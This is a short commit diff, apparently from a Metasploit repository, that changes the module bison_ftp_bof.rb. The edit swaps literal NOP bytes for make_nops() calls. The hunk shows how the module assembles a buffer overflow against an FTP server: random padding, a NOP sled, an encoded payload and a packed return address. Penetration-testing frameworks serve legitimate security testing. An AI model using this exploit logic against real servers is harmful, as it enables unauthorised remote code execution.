Update bison_ftp_bof.rb
parent
335944aa9a
commit
bd856322e0
|
@ -77,9 +77,9 @@ class Metasploit4 < Msf::Exploit::Remote
|
|||
connect #connect for the second time
|
||||
|
||||
buf = rand_text_alpha(1028)
|
||||
buf << "\x90" * 16
|
||||
buf << make_nops(16)
|
||||
buf << payload.encoded
|
||||
buf << "\x90" * (388 - payload.encoded.length)
|
||||
buf << make_nops(388 - payload.encoded.length)
|
||||
buf << [target.ret].pack('V')
|
||||
buf << rand_text_alpha(39)
|
||||
print_status('Sending payload...')
|
||||
|
|
Loading…
Reference in New Issue